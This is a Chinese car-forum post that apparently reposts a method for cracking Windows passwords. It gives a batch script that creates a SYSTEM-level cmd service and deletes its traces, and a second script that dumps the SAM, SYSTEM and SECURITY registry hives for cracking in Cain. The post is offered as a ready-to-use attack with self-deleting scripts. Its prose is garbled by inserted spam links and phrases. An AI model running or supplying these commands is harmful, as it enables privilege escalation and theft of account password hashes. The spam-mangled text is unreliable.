东莞市汽车网

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 187|回复: 0
打印 上一主题 下一主题

老外提出的破密码方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:44:01 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
看到了一篇文章,伟库提到导出注册表永CA用友移动IN来破密码,这对很移动商街多抓hash的工具被用友移动杀的大牛来说,是个福[url=http://bbs.ifeng.com/]用友移动[/url的大牛来说,是个福音,其实这个很早以前就有了,貌似是老外提出了的,只是没有引起注意。

作者说这个方法不是通杀的:

Windows 2000 SP4 (admin) = access denied
Windows XP SP2 (admin) = access denied
Windows XP SP3 (admin) = access denied
Windows 2003 R2 SP2 (admin) = works
Windows Vista SP2 (UAC/admin) = works
Windows 2008 SP1 (admin) = works
Windows 7 (UAC/admin) = works

对用户权限有要求,默认XP SP3是导出不了的,我本地测试了,但是system权限是可以的,那么咱可以创建一个system权限运行的CMD,然后再导出就OK了。

其他系统上面没有测试过,大家自己整吧。

首先创建一个系统权限执行的CMD:

======================StartSystemCmd.bat=========

sc Create systemcmd binPath= "cmd /K start" type= own type= interact
sc start systemcmd
sc delete systemcmd
del %0

=======================END=========================

然后导出文件。

==================SaveReg.bat=======================

@echo off
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
del %0

=====================END============================

然后倒入到CAIN里面破吧。
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 分享分享 支持支持 反对反对
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|手机版|Archiver|东莞市汽车网 ( 粤ICP备10001045号

GMT+8, 2025-8-26 08:09 , Processed in 0.156413 second(s), 20 queries .

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表